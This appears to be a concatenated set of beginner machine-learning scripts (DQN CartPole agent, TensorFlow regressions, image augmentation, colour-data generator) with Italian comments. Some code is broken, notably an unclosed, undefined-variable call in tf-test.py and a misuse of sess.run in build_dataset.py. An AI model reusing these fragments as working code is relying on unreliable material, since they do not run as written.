forest = RandomForestClassifier(n_estimators = 100)
# Fit the forest to the training set, using the bag of words as
# features and the sentiment labels as the response variable
#
# This may take a few minutes to run
forest = forest.fit( train_data_features, train["sentiment"] )<file_sep>/dqn.py
# -*- coding: utf-8 -*-
# https://keon.io/deep-q-learning/
# CartPole-v0 - https://github.com/openai/gym/wiki/CartPole-v0
# 0 Cart Position -2.4 2.4
# 1 Cart Velocity -Inf Inf
# 2 Pole Angle ~ -41.8° ~ 41.8°
# 3 Pole Velocity At Tip -Inf Inf
# The system is controlled by applying a force of +1 or -1 to the cart.
# The pendulum starts upright, and the goal is to prevent it from falling over.
# A reward of +1 is provided for every timestep that the pole remains upright.
# The episode ends when the pole is more than 15 degrees from vertical, or the cart moves more than 2.4 units from the center.
import matplotlib.pyplot as plt
import matplotlib.animation as animation
import random
import gym
import numpy as np
from collections import deque
from keras.models import Sequential
from keras.layers import Dense
from keras.optimizers import Adam
EPISODES = 1000
class DQNAgent:
def __init__(self, state_size, action_size):
self.state_size = state_size
self.action_size = action_size
self.memory = deque(maxlen=2000) # FIFO len 2000
self.gamma = 0.95 # discount rate
self.epsilon = 1.0 # exploration rate
self.epsilon_min = 0.01
self.epsilon_decay = 0.995
self.learning_rate = 0.001
self.model = self._build_model()
def _build_model(self):
# Neural Net for Deep-Q learning Model
model = Sequential()
model.add(Dense(24, input_dim=self.state_size, activation='relu'))
model.add(Dense(24, activation='relu'))
model.add(Dense(self.action_size, activation='linear'))
# For a mean squared error regression problem
model.compile(loss='mse', optimizer=Adam(lr=self.learning_rate))
return model
def remember(self, state, action, reward, next_state, done):
self.memory.append((state, action, reward, next_state, done))
def act(self, state):
# Agente agisce
if np.random.rand() <= self.epsilon:
retvalue = random.randrange(self.action_size)
# print(retvalue)
# print("DQNAgent:act R {}".format(retvalue))
return retvalue
act_values = self.model.predict(state)
retvalue = np.argmax(act_values[0])
# print("DQNAgent:act P {}".format(retvalue))
return retvalue # returns action
def replay(self, batch_size):
minibatch = random.sample(self.memory, batch_size)
for state, action, reward, next_state, done in minibatch:
target = reward
if not done:
target = (reward + self.gamma *
np.amax(self.model.predict(next_state)[0]))
target_f = self.model.predict(state)
target_f[0][action] = target
# print("MODEL FIT ", state[0][0], state[0][2], target_f, target, done )
# train with state and target_f
self.model.fit(state, target_f, epochs=1, verbose=0)
if self.epsilon > self.epsilon_min:
self.epsilon *= self.epsilon_decay
def load(self, name):
self.model.load_weights(name)
def save(self, name):
self.model.save_weights(name)
if __name__ == "__main__":
# enable plot update
plt.ion()
fig = plt.figure()
ax1 = fig.add_subplot(211)
ax1.set_xlabel('GameN')
ax1.set_ylabel('Score')
ax1.set_title('Q-Learning')
ax1.set_xlim([0, EPISODES])
x_data = []
y_data = []
#ax1.axis(0,0,100,100)
#line, = ax1.plot([], [], lw=2)
#line.set_data([], [])
# self.line1 = Line2D([], [], color='black')
ax2 = fig.add_subplot(212)
ax2.set_xlim([0, EPISODES])
env = gym.make('CartPole-v1')
state_size = env.observation_space.shape[0]
action_size = env.action_space.n
print("state_size: {}, action_size: {}".format(state_size,action_size))
agent = DQNAgent(state_size, action_size)
# agent.load("./save/cartpole-dqn.h5")
done = False
batch_size = 32
ax1.set_ylim([0, agent.epsilon])
for e in range(EPISODES):
state = env.reset()
state = np.reshape(state, [1, state_size])
# print(state)
print("START EPISODE {}".format(e), state)
for time in range(500):
# env.render()
# sceglie l'azione
action = agent.act(state)
# applica l'azione
next_state, reward, done, _ = env.step(action)
# print(time, action, done, reward, next_state)
reward = reward if not done else -10
next_state = np.reshape(next_state, [1, state_size])
# add to memory
agent.remember(state, action, reward, next_state, done)
state = next_state
# se finito stampa i dati
if done:
print("episode: {}/{}, score: {}, e: {:.2}"
.format(e, EPISODES, time, agent.epsilon))
#ax1.plot(e, time, 'ro')
#plt.plot(e, time, 'ro')
#xdata.append(e)
#ydata.append(time)
#line.set_xdata(xdata)
#line.set_ydata(ydata)
#plt.draw()
#plt.show()
#plt.pause(1e-17)
ax1.plot(e, agent.epsilon, 'ro')
x_data.append(e)
y_data.append(time)
ax2.plot(x_data, y_data, 'g-')
# ax1.set_xlabel('x step: {0} cost: {1}'.format(step, c1))
# plt.xlim(-2, 2)
# plt.ylim(0.1, 0.6)
# plt.ylabel('y {0} '.format(step))
plt.pause(1e-17)
#plt.legend()
plt.show()
#plt.pause(0.1)
#plt.legend()
#plt.show()
break
# se la memoria è maggiore della dimensione del batcj esegue un replay per il training
if len(agent.memory) > batch_size:
# print("REPLAY ", len(agent.memory),batch_size)
agent.replay(batch_size)
# if e % 10 == 0:
# agent.save("./save/cartpole-dqn.h5")
fig.savefig('dqnOutput.png')<file_sep>/Gradient-Demo-TB.py
import numpy as np
# import matplotlib.pyplot as plt
import tensorflow as tf
# helper for variable defs
def init_weights(shape, name):
return tf.Variable(tf.random_normal(shape, stddev=0.01), name=name)
MODEL_FOLDER = './model/gradient-demo-tb'
# enable plot update
# plt.ion()
# plt.legend()
# Funzione da minimizzare
# y = 0.1 * x + 0.3
num_points = 1000
# STEP 1 - input data build
with tf.name_scope('input'):
vectors_set = []
for i in range(num_points):
x1 = np.random.normal(0.0, 0.55)
y1 = x1 * 0.1 + 0.3 + np.random.normal(0.0, 0.03)
vectors_set.append([x1, y1])
x_data = [v[0] for v in vectors_set]
y_data = [v[1] for v in vectors_set]
#tf.summary.image('input_x', x_data, 10)
#tf.summary.image('input_y', y_data, 10)
# STEP 2 - create input and placeholders
# The objective is to generate a TensorFlow code that allows to find the best parameters W and b,
# that from input data x_data, adjunct them to y_data output data, in our case it will be a straight
# line defined by y_data = W * x_data + b .
# The reader knows that W should be close to 0.1 and b to 0.3,
# but TensorFlow does not know and it must realize it for itself.
W = tf.Variable(tf.random_uniform([1], -1.0, 1.0))
b = tf.Variable(tf.zeros([1]))
#STEP 3 - model
y = W * x_data + b
#STEP 4 - cost function
# mean squared error helps us to move forward step by step.
with tf.name_scope("cost"):
cost = tf.reduce_mean(tf.square(y - y_data))
# train_op = tf.train.RMSPropOptimizer(0.001, 0.9).minimize(cost)
train_op = tf.train.GradientDescentOptimizer(0.5).minimize(cost)
#STEP 5 - Summary all variables
# Initializing the variables
init = tf.global_variables_initializer()
tf.summary.scalar("cost", cost)
# Create summaries to visualize weights
for var in tf.trainable_variables():
print(var.name)
tf.summary.histogram(var.name, var)
## Summarize all gradients
#for grad, var in grads:
# tf.summary.histogram(var.name + '/gradient', grad)
# Merge all summaries into a single op
merged_summary_op = tf.summary.merge_all()
#Step 9 Create a session - START
with tf.Session() as sess:
# The algorithm begins with the initial values of a set of parameters (in our case W and b),
# and then the algorithm is iteratively adjusting the value of those variables in a way that,
# in the end of the process, the values of the variables minimize the cost function.
# Step 10 create a log writer. run 'tensorboard --logdir=./logs/nn_logs'
summary_writer = tf.summary.FileWriter(MODEL_FOLDER, sess.graph) # for 0.8
# merged = tf.summary.merge_all()
sess.run(init)
for step in range(100):
t, summary, c = sess.run([train_op,merged_summary_op,cost])
print(c)
summary_writer.add_summary(summary, c)
print(step, sess.run(W), sess.run(b), sess.run(cost))
print("Run the command line:\n --> tensorboard --logdir=/tmp/tensorflow_logs nThen open http://0.0.0.0:6006/ into your web browser")
<file_sep>/data_augmentation.py
# Data Augmentation
# Preparaun set di immagini dalle originali con alcune trasformazioni mantenendo la dimensione originale
#
# 1. Rotazione destra sinistra (3°)
# 2. Traslazione 10, 20 px
# 3. Zoom
#
import PIL
from PIL import Image
from PIL import ImageFilter
from PIL import ImageOps
import skimage
import os
from skimage.viewer import ImageViewer
from skimage import data
from skimage import io
from skimage import transform
from skimage.transform import rescale
SOURCE_FILE_FOLDER = 'C:/Users/M05831/Downloads/C_I/output_png'
SOURCE_FILE_FOLDER_COLLECTION = 'C:/Users/M05831/Downloads/C_I/output_png/*.png'
OUTPUT_FILE_FOLDER = 'C:/Users/M05831/Downloads/C_I/output_test'
print('START')
print(SOURCE_FILE_FOLDER)
def rotate_image_and_save(img2rotate, rotation, fname):
print('rotata_image:', rotation)
im2 = img2rotate.convert('RGBA')
print(im2.size)
# rotated image
rot = im2.rotate(rotation, expand=1)
# a white image same size as rotated image
# fff = Image.new('RGBA', rot.size, (255,) * 4)
print(rot.size)
fff = Image.new('RGBA', (160,120), (255,) * 4)
# create a composite image using the alpha layer of rot as a mask
out = Image.composite(rot, fff, rot)
print(out.size)
out.save(fname, "PNG")
files = [ f for f in os.listdir(SOURCE_FILE_FOLDER) if os.path.isfile(os.path.join(SOURCE_FILE_FOLDER, f))]
for f in files:
print(f)
filename = os.path.join(SOURCE_FILE_FOLDER, f)
print('open:' + filename)
im = Image.open(filename)
print(im.size)
print(im.mode)
# PIL.ImageOps.grayscale(image)
imGray = PIL.ImageOps.grayscale(im)
filename = os.path.join(OUTPUT_FILE_FOLDER, 'G1' + f)
imGray.save(filename, "PNG")
print('GrayScale:' + filename)
print(imGray.size)
print(imGray.mode)
print(list(imGray.getdata()))
# 1 - Espansione con bordo bianco
imExp = PIL.ImageOps.expand(imGray , 10, '#ffffff')
filename = os.path.join(OUTPUT_FILE_FOLDER, 'X1' + f)
print('border:' + filename)
#imExp.save(filename, "PNG")
# PIL.ImageOps.fit(image, size, method=0, bleed=0.0, centering=(0.5, 0.5))
###imRot = imExp.rotate(3.0) # degrees counter-clockwise
filename = os.path.join(OUTPUT_FILE_FOLDER, 'R2' + f)
print('border:' + filename)
###imRot.save(filename, "PNG")
# ZOOM_1
# ZOOM_2
# viewer = ImageViewer(moon)
# viewer.show()
rotate_image_and_save(imExp, 3.0, os.path.join(OUTPUT_FILE_FOLDER, 'R1' + f))
rotate_image_and_save(imExp,-3.0, os.path.join(OUTPUT_FILE_FOLDER, 'R2' + f))
rotate_image_and_save(imExp, 4.0, os.path.join(OUTPUT_FILE_FOLDER, 'R3' + f))
rotate_image_and_save(imExp,-4.0, os.path.join(OUTPUT_FILE_FOLDER, 'R4' + f))
#ic = io.ImageCollection(SOURCE_FILE_FOLDER_COLLECTION, conserve_memory=False, plugin='test')
#io.imshow_collection(ic)
print('END')
#filename = os.path.join(skimage.data_dir, 'moon.png')
#moon = io.imread(filename)
#camera = data.camera()
#type(camera)
#image = data.coins()
#viewer = ImageViewer(image)
#viewer.show()<file_sep>/tf-DNN-REGRESSION-COLOR.py
# https://www.tensorflow.org/get_started/input_fn
# https://github.com/tensorflow/tensorflow/blob/r1.3/tensorflow/examples/tutorials/input_fn/boston.py
"""DNNRegressor with custom input_fn for Complementary Color TEST!!!! dataset."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import itertools
import pandas as pd
import tensorflow as tf
tf.logging.set_verbosity(tf.logging.INFO)
# SOURCE_COLOR_R,SOURCE_COLOR_G,SOURCE_COLOR_B,COMPLEMENT_COLOR_R,COMPLEMENT_COLOR_G,COMPLEMENT_COLOR_B
COLUMNS = ["SOURCE_COLOR","COMPLEMENT_COLOR"]
FEATURES = ["SOURCE_COLOR"]
# LABELS = ["COMPLEMENT_COLOR_R","COMPLEMENT_COLOR_G","COMPLEMENT_COLOR_B"]
LABELS = ["COMPLEMENT_COLOR_R"]
LABEL = "COMPLEMENT_COLOR"
C_COLOR_TRAINING = "tf-c-color-training.csv"
C_COLOR_TEST = "tf-c-color-test.csv"
C_COLOR_PREDICT = "tf-c-color-prediction.csv"
# for TensorBoard
MODEL_DIR = "c:/ai/nn/tmp/model/dnnccolorregression"
def get_input_fn(data_set, num_epochs=None, shuffle=True):
return tf.estimator.inputs.pandas_input_fn(
x=pd.DataFrame({k: data_set[k].values for k in FEATURES}),
y=pd.Series(data_set[LABEL].values),
#y=pd.DataFrame({k: data_set[k].values for k in LABELS}),
num_epochs=num_epochs,
shuffle=shuffle)
def main(unused_argv):
# Load datasets
training_set = pd.read_csv(C_COLOR_TRAINING, skipinitialspace=True, skiprows=1, names=COLUMNS)
test_set = pd.read_csv(C_COLOR_TEST, skipinitialspace=True, skiprows=1, names=COLUMNS)
# Set of 6 examples for which to predict median house values
prediction_set = pd.read_csv(C_COLOR_PREDICT, skipinitialspace=True, skiprows=1, names=COLUMNS)
# Feature cols
feature_cols = [tf.feature_column.numeric_column(k) for k in FEATURES]
# Build 2 layer fully connected DNN with 10, 10 units respectively.
regressor = tf.estimator.DNNRegressor(feature_columns=feature_cols,
hidden_units=[30, 20, 10],
# label_dimension=2, # modifica per output multi-dimensionale
model_dir=MODEL_DIR)
# Train
# regressor.train(input_fn=get_input_fn(training_set), steps=1000)
# Evaluate loss over one epoch of test_set.
# ev = regressor.evaluate( input_fn=get_input_fn(test_set, num_epochs=1, shuffle=False ))
# loss_score = ev["loss"]
# print("Loss: {0:f}".format(loss_score))
# Print out predictions over a slice of prediction_set.
y = regressor.predict( input_fn=get_input_fn(prediction_set, num_epochs=1, shuffle=False) )
# .predict() returns an iterator of dicts; convert to a list and print
# predictions
# predictions = list(p["predictions"] for p in itertools.islice(y, 6))
predictions = list(p["predictions"] for p in y)
print("Predictions: {}".format(str(predictions)))
print("Predictions_set")
for ps in prediction_set:
print(ps)
print("predictions")
for p in predictions:
print(p)
if __name__ == "__main__":
tf.app.run()<file_sep>/README.md
## Tf Project
Progetto
# tf-simple-tensorboard.py
<file_sep>/tf-test.py
# test con i tensori
# test con la gestione delle immagini
# test input variable and softmax examples..
# test con TensorBoard
import tensorflow as tf
import matplotlib.pyplot as plt
import numpy as np
import pandas as pd
import csv
import io
print("Tensorflow version: " + tf.__version__)
tf.set_random_seed(1)
weights = tf.Variable(tf.random_normal([784, 200], stddev=0.35), name="weights")
biases = tf.Variable(tf.zeros([200]), name="biases")
b_test = tf.Variable(tf.random_uniform([6], minval=0.0, maxval=1.0, dtype=tf.float32), name="eeee")
init = tf.global_variables_initializer()
MODEL_FOLDER = './model/test-tf-test'
# Crea un grafico da una serie di punti
def gen_plot(d):
"""Create a pyplot plot and save to buffer."""
plt.figure()
plt.plot(d[:,0],d[:,1],'ro')
plt.title("Punti di interesse")
buf = io.BytesIO()
plt.savefig(buf, format='png')
buf.seek(0)
return buf
# Crea un grafico da una serie di punti
def read_and_decode(d):
print('Read and decode')
plt.figure()
plt.plot(d[:,0],d[:,1],'ro')
plt.title("Punti di interesse")
buf = io.BytesIO()
plt.savefig(buf, format='png')
buf.seek(0)
image = tf.image.decode_png(buf.getvalue(), channels=4)
# Add the batch dimension
image = tf.expand_dims(image, 0)
return image
# Aggiorna il tensore con le immagini
def update_images():
print('update_images')
return
print('Start operazioni')
dati = np.random.randint(100, size=(20, 2))
current_image_object = read_and_decode(dati)
# tf.concat([t1, t2], 0)
lista_immagini = tf.concat([current_image_object, read_and_decode(dati)],0)
# definisce variabili per TB
tf.summary.histogram("normal/moving_mean", weights)
tf.summary.histogram("normal/loss", biases)
tf.summary.histogram("normal/loss1", Y, Y_
#tf.summary.scalar("normal/current_w", b_test)
tf.summary.image("img", current_image_object)
tf.summary.image("img2", lista_immagini)
with tf.Session() as sess:
#print the product
sess.run([init])
writer = tf.summary.FileWriter(MODEL_FOLDER, sess.graph)
writer2 = tf.summary.FileWriter(MODEL_FOLDER, sess.graph)
summaries = tf.summary.merge_all()
for i in range(5):
print('Step:',i)
rd, summary, li = sess.run([current_image_object, summaries, lista_immagini])
# print(weights.eval())
print("b_test:")
print(b_test.eval())
lista_immagini = tf.zeros([3, 4], tf.int32)
b_test_softmax = tf.nn.softmax(b_test)
print("b_test_softmax:")
print(b_test_softmax.eval())
# print(current_image_object.eval())
writer.add_summary(summary, global_step=i)
sess.close()<file_sep>/Gradient-Demo.py
import numpy as np
import matplotlib.pyplot as plt
import tensorflow as tf
# helper for variable defs
def init_weights(shape, name):
return tf.Variable(tf.random_normal(shape, stddev=0.01), name=name)
# enable plot update
plt.ion()
plt.legend()
# Funzione da minimizzare
# y = 0.1 * x + 0.3
num_points = 1000
# STEP 1 - input data build
vectors_set = []
for i in range(num_points):
x1 = np.random.normal(0.0, 0.55)
y1 = x1 * 0.1 + 0.3 + np.random.normal(0.0, 0.03)
vectors_set.append([x1, y1])
x_data = [v[0] for v in vectors_set]
y_data = [v[1] for v in vectors_set]
# STEP 2 - create input and placeholders
# The objective is to generate a TensorFlow code that allows to find the best parameters W and b,
# that from input data x_data, adjunct them to y_data output data, in our case it will be a straight
# line defined by y_data = W * x_data + b .
# The reader knows that W should be close to 0.1 and b to 0.3,
# but TensorFlow does not know and it must realize it for itself.
W = tf.Variable(tf.random_uniform([1], -1.0, 1.0))
b = tf.Variable(tf.zeros([1]))
#STEP 3 - model
y = W * x_data + b
#STEP 4 - cost function
# mean squared error helps us to move forward step by step.
cost = tf.reduce_mean(tf.square(y - y_data))
# train_op = tf.train.RMSPropOptimizer(0.001, 0.9).minimize(cost)
train_op = tf.train.GradientDescentOptimizer(0.1).minimize(cost)
# tf.scalar_summary("cost", cost)
# Initializing the variables
init = tf.global_variables_initializer()
#Step 9 Create a session - START
with tf.Session() as sess:
# The algorithm begins with the initial values of a set of parameters (in our case W and b),
# and then the algorithm is iteratively adjusting the value of those variables in a way that,
# in the end of the process, the values of the variables minimize the cost function.
sess.run(init)
fig1 = plt.figure()
ax1 = fig1.add_subplot(211)
ax2 = fig1.add_subplot(212)
for step in range(10):
t1,w1, b1, c1 = sess.run([train_op, W, b, cost])
# print(step, sess.run(W), sess.run(b), sess.run(cost))
print(w1, c1)
ax1.plot(x_data, y_data, 'ro')
# ax1.plot(x_data, sess.run(W) * x_data + sess.run(b))
ax1.plot(x_data, w1 * x_data + b1)
ax2.plot(x_data, w1 * x_data + b1)
ax1.set_xlabel('x step: {0} cost: {1}'.format(step,c1))
# plt.xlim(-2, 2)
# plt.ylim(0.1, 0.6)
# plt.ylabel('y {0} '.format(step))
plt.pause(0.5)
plt.legend()
plt.show()
<file_sep>/tf-complementary-generator.py
# Complementary color generator
# https://www.mathsisfun.com/hexadecimal-decimal-colors.html
import csv
from random import randint
NUM_OF_ROW_DATA_TRAINING = 1000
NUM_OF_ROW_DATA_TEST = 100
NUM_OF_ROW_DATA_PREDICTION = 10
MAX_COLOR_VALUE = 16777215
# Sum of the min & max of (a, b, c)
def hilo(a, b, c):
if c < b: b, c = c, b
if b < a: a, b = b, a
if c < b: b, c = c, b
return a + c
def complement(r, g, b):
k = hilo(r, g, b)
return list(k - u for u in (r, g, b))
def genColor():
r = randint(0, 255)
g = randint(0, 255)
b = randint(0, 255)
# print(r,g,b)
l = [r,g,b]
return l
def color2num(c):
# print((65536 * c[0] + 256 * c[1] + c[2]))
return (65536 * c[0] + 256 * c[1] + c[2]) / MAX_COLOR_VALUE
def num2col(n):
nv = n * MAX_COLOR_VALUE
# print('nv:', nv)
r = int( nv / 65536 )
# print(r * 65536)
g = int ( (nv - ( r * 65536) ) / 256 )
b = int ( (nv - ( r * 65536) - ( g * 256 ) ) )
return [r, g, b]
def generateData( numOfRow, fileName ):
print('Generate', numOfRow, fileName )
with open(fileName, 'wt') as csvfile:
writer = csv.writer(csvfile, lineterminator='\n')
writer.writerow(('SOURCE_COLOR','COMPLEMENT_COLOR'))
for count in range(1, numOfRow):
# print(count)
t = genColor()
c = complement(t[0],t[1],t[2])
# print(t[0],t[1],t[2],c[0],c[1],c[2])
# writer = csv.writer(csvfile, delimiter=',', quotechar='', quoting=csv.QUOTE_MINIMAL)
# writer.writerow( ('Title 1', 'Title 2', 'Title 3') )
#writer.writerow((t[0],t[1],t[2],c[0],c[1],c[2]))
writer.writerow( (color2num(t),color2num(c)) )
csvfile.close()
return
def generateDataPredict( numOfRow, fileName ):
print('Generate', numOfRow, fileName )
with open(fileName, 'wt') as csvfile:
writer = csv.writer(csvfile, lineterminator='\n')
writer.writerow(('SOURCE_COLOR','NONE'))
for count in range(1, numOfRow):
# print(count)
t = genColor()
c = complement(t[0],t[1],t[2])
# print(t[0],t[1],t[2],c[0],c[1],c[2])
# writer = csv.writer(csvfile, delimiter=',', quotechar='', quoting=csv.QUOTE_MINIMAL)
writer.writerow( (color2num(t), color2num(c)) )
#writer.writerow((t[0],t[1],t[2]))
csvfile.close()
return
test = genColor()
cn = color2num(test)
nc = num2col(cn)
cp = complement(test[0],test[1],test[2])
print(test, cn, nc)
#generateData(NUM_OF_ROW_DATA_TRAINING, 'tf-c-color-training.csv')
#generateData(NUM_OF_ROW_DATA_TEST, 'tf-c-color-test.csv')
generateDataPredict(NUM_OF_ROW_DATA_PREDICTION, 'tf-c-color-prediction.csv')
print('FINE OPERAZIONI')<file_sep>/build_dataset.py
# https://www.codementor.io/jimmfleming/how-i-built-a-reverse-image-search-with-machine-learning-and-tensorflow-part-1-8dje8gjm9
# https://indico.io/blog/tensorflow-data-inputs-part1-placeholders-protobufs-queues/
# Build DataSet ...
# Da una cartelle di immagini prepara il dataset per la rete
#
# 1. Rotazione destra sinistra (3°)
# 2. Traslazione 10, 20 px
# 3. Zoom
import PIL
from PIL import Image
from PIL import ImageFilter
from PIL import ImageOps
import skimage
# REMOVE WARNING compile!
import os
os.environ['TF_CPP_MIN_LOG_LEVEL']='2'
from skimage import data
from skimage import io
from skimage import transform
from skimage.transform import rescale
import tensorflow as tf
print("Tensorflow version " + tf.__version__)
tf.set_random_seed(0)
tf.logging.set_verbosity(tf.logging.INFO)
print('1-Start --------------------------------------------------------- 1 ')
SOURCE_FILE_FOLDER = 'C:/Users/M05831/Downloads/C_I/output_png'
SOURCE_FILE_FOLDER_COLLECTION = 'C:/Users/M05831/Downloads/C_I/output_png/*.png'
OUTPUT_FILE_FOLDER = 'C:/Users/M05831/Downloads/C_I/output_test'
# TF https://www.tensorflow.org/programmers_guide/reading_data
# Reading from files
# A typical pipeline for reading records from files has the following stages:
# The list of filenames
# Optional filename shuffling
# Optional epoch limit
# Filename queue
# A Reader for the file format
# A decoder for a record read by the reader
# Optional preprocessing
# Example queue
# Make a queue of file names including all the JPEG images files in the relative
# image directory.
def generate_input_fn(file_pattern, batch_size, num_epochs=None, shuffle=False):
"Return _input_fn for use with Experiment."
def _input_fn():
height, width, channels = [256, 256, 3]
filenames_tensor = tf.train.match_filenames_once(file_pattern)
filename_queue = tf.train.string_input_producer(
filenames_tensor,
num_epochs=num_epochs,
shuffle=shuffle)
reader = tf.WholeFileReader()
filename, contents = reader.read(filename_queue)
image = tf.image.decode_jpeg(contents, channels=channels)
image = tf.image.resize_image_with_crop_or_pad(image, height, width)
image_batch, filname_batch = tf.train.batch(
[image, filename],
batch_size,
num_threads=4,
capacity=50000)
# Converts image from uint8 to float32 and rescale from 0..255 => 0..1
# Rescale from 0..1 => -1..1 so that the "center" of the image range is roughly 0.
image_batch = tf.to_float(image_batch) / 255
image_batch = (image_batch * 2) - 1
features = {
"image": image_batch,
"filename": filname_batch
}
labels = {
"image": image_batch
}
return features, labels
return _input_fn
all_files = [ (SOURCE_FILE_FOLDER + '/' + f) for f in os.listdir(SOURCE_FILE_FOLDER) if os.path.isfile(os.path.join(SOURCE_FILE_FOLDER, f))]
print(all_files)
print('2-Start --------------------------------------------------------- 1 ')
fq1 = tf.train.match_filenames_once(all_files)
# fq1 = tf.train.match_filenames_once(['./images/*.jpg','c:/*.*'])
#fq1 = ["c:/Users/M05831/PycharmProjects/nn/images/a.png", "c:/Users/M05831/PycharmProjects/nn/images/b.png"]
#tf.train.match_filenames_once('')
print('3-Start --------------------------------------------------------- 1 ')
filename_queue = tf.train.string_input_producer(all_files)
# Read an entire image file which is required since they're JPEGs, if the images
# are too large they could be split in advance to smaller files or use the Fixed
# reader to split up the file.
print('4-Start --------------------------------------------------------- 1 ')
image_reader = tf.WholeFileReader()
# Read a whole file from the queue, the first returned value in the tuple is the
# filename which we are ignoring.
print('5-Start --------------------------------------------------------- 1 ')
_, image_file = image_reader.read(filename_queue)
# Decode the image as a JPEG file, this will turn it into a Tensor which we can
# then use in training.
# image = tf.image.decode_jpeg(image_file) JPEG
print('6-Start --------------------------------------------------------- 1 ')
image = tf.image.decode_png(image_file)
init = tf.global_variables_initializer()
# Start a new session to show example output.
with tf.Session() as sess:
# Required to get the filename matching to run.
#tf.initialize_all_variables().run()
sess.run(init)
F,L = sess.run([generate_input_fn])
print('R1 - Start --------------------------------------------------------- 1 ')
# print(sess.run(fq1))
print('R2 - Start --------------------------------------------------------- 2 ')
# Coordinate the loading of image files.
coord = tf.train.Coordinator()
threads = tf.train.start_queue_runners(coord=coord)
print('R3 - Start --------------------------------------------------------- 2 ')
# Get an image tensor and print its value.
image_tensor = sess.run([image])
print(image_tensor)
# Finish off the filename queue coordinator.
coord.request_stop()
coord.join(threads)
<file_sep>/GraphDemo.py
import matplotlib.pyplot as plt
import matplotlib.animation as animation
import random
import gym
import numpy as np
EPISODES = 1000
x_data = []
y_data = []
plt.ion()
fig = plt.figure()
ax1 = fig.add_subplot(211)
ax1.set_xlabel('x')
ax1.set_ylabel('y')
ax1.set_title('fff')
ax1.set_xlim([0, EPISODES])
ax1.set_ylim([0, 500])
ax2 = fig.add_subplot(212)
for e in range(1000):
y = random.randint(0,500)
print(e, y)
ax1.plot(e, y, 'ko')
x_data.append(e)
y_data.append(y)
ax2.plot(x_data, y_data, 'b-')
#line.set_data(e, y)
plt.pause(0.05)
while True:
plt.pause(0.05)<file_sep>/ml-course-week-1.py
# https://www.coursera.org/learn/ml-foundations/supplement/RP8te/reading-predicting-house-prices-assignment
# WEEK 1
# Regressione lineare sui dati home price prediction in TensorFlow
'''
my_features = ['bedrooms', 'bathrooms', 'sqft_living', 'sqft_lot', 'floors', 'zipcode']
advanced_features = [
'bedrooms', 'bathrooms', 'sqft_living', 'sqft_lot', 'floors', 'zipcode',
'condition', # condition of house
'grade', # measure of quality of construction
'waterfront', # waterfront property
'view', # type of view
'sqft_above', # square feet above ground
'sqft_basement', # square feet in basement
'yr_built', # the year built
'yr_renovated', # the year renovated
'lat', 'long', # the lat-long of the parcel
'sqft_living15', # average sq.ft. of 15 nearest neighbors
'sqft_lot15', # average lot size of 15 nearest neighbors
]
'''
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
import urllib
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
# Data sets
DATA_DIR = "./data/home/"
SOURCE_SET = DATA_DIR + "home.csv"
TRAINING_SET = DATA_DIR + "home-training.csv"
TEST_SET = DATA_DIR + "home-test.csv"
PREDICTION_SET = DATA_DIR + "home-prediction.csv"
# for TensorBoard
MODEL_DIR = "./model/home"
MODEL_TRAINIG_STEP = 1000
print('## Start operazioni')
import tensorflow as tf
tf.logging.set_verbosity(tf.logging.INFO)
print("Tensorflow version: " + tf.__version__)
COLUMNS = ["sqft_living", "price"]
FEATURES = ["sqft_living", "price"]
LABEL = "price"
def get_input_fn(data_set, num_epochs=None, shuffle=True):
return tf.estimator.inputs.pandas_input_fn(
x=pd.DataFrame({k: data_set[k].values for k in FEATURES}),
y=pd.Series(data_set[LABEL].values),
num_epochs=num_epochs,
shuffle=shuffle)
def build_dataset():
print('## Build Data Set')
all_data = pd.read_csv(SOURCE_SET)
print(all_data)
# Visualizzazione dati
# df = pd.Series(np.random.randn(1000), index=pd.date_range('1/1/2000', periods=1000))
'''
df = pd.Series(all_data['sqft_living'], all_data['price'])
plt.figure()
plt.plot(all_data['sqft_living'],all_data['price'],'ro')
plt.show()
'''
print('Sezione di features')
my_features = all_data[['sqft_living','price']]
print(my_features)
all_data['split'] = np.random.randn(all_data.shape[0], 1)
msk = np.random.rand(len(all_data)) <= 0.7
train = all_data[msk]
test = all_data[~msk]
print(train)
print(test)
print(len(train))
print(len(test))
print('Save data :', TRAINING_SET)
train.to_csv(TRAINING_SET, encoding='utf-8-sig')
print('Save data :', TEST_SET)
test.to_csv(TEST_SET, encoding='utf-8-sig')
return
def show_sample_data():
MAX_ROW = 100
print('Show sample data ... first n row', MAX_ROW, TRAINING_SET)
training_set = pd.read_csv(TRAINING_SET, nrows=MAX_ROW)
print(training_set[['sqft_living','price']])
print('Show sample data ... first n row', MAX_ROW, TEST_SET)
test_set = pd.read_csv(TEST_SET, nrows=MAX_ROW)
print(test_set[['sqft_living','price']])
return
def main(unused_argv):
# Cotruisce i file per il modello
# build_dataset()
# show_sample_data()
# exit(0)
# Load datasets
print('Loading datasets')
training_set = pd.read_csv(TRAINING_SET, skipinitialspace=True, skiprows=1, names=COLUMNS)
test_set = pd.read_csv(TEST_SET, skipinitialspace=True, skiprows=1, names=COLUMNS)
# Set of 6 examples for which to predict median house values
# prediction_set = pd.read_csv("boston_predict.csv", skipinitialspace=True, skiprows=1, names=COLUMNS)
# Feature cols
feature_cols = [tf.feature_column.numeric_column(k) for k in FEATURES]
# summaryWriter
tf.summary.scalar("label", tensor=tf.constant(1))
tf.summary.text(name='loss123',tensor=tf.constant('MARiO'))
merged = tf.summary.merge_all()
# https://www.tensorflow.org/api_guides/python/train#Training_Hooks
# https://www.tensorflow.org/api_docs/python/tf/train/SummarySaverHook
hooks = [
tf.train.LoggingTensorHook({'loss'}, every_n_iter = 10),
tf.train.StepCounterHook(every_n_steps=100),
tf.train.SummarySaverHook(save_steps=100,summary_op=merged)
]
# Build regessor
print('Regressor...')
regressor = tf.estimator.LinearRegressor(feature_columns=feature_cols,
# hidden_units=[30, 20, 10],
# label_dimension=2, # modifica per output multi-dimensionale
model_dir=MODEL_DIR)
# Train
# print('Training...')
regressor.train(
input_fn=get_input_fn(training_set),
# hooks List of SessionRunHook subclass instances. Used for callbacks inside the training loop.
hooks=hooks,
steps=MODEL_TRAINIG_STEP)
# Evaluate loss over one epoch of test_set.
print('Evaluate...')
ev = regressor.evaluate(input_fn=get_input_fn(test_set, num_epochs=1, shuffle=False))
loss_score = ev["loss"]
print("Loss: {0:f}".format(loss_score))
print(ev)
print('### Fine Operazioni ###')
if __name__ == "__main__":
tf.app.run()
<file_sep>/tf-simple-tensorboard.py
""" Simple linear regression example in TensorFlow
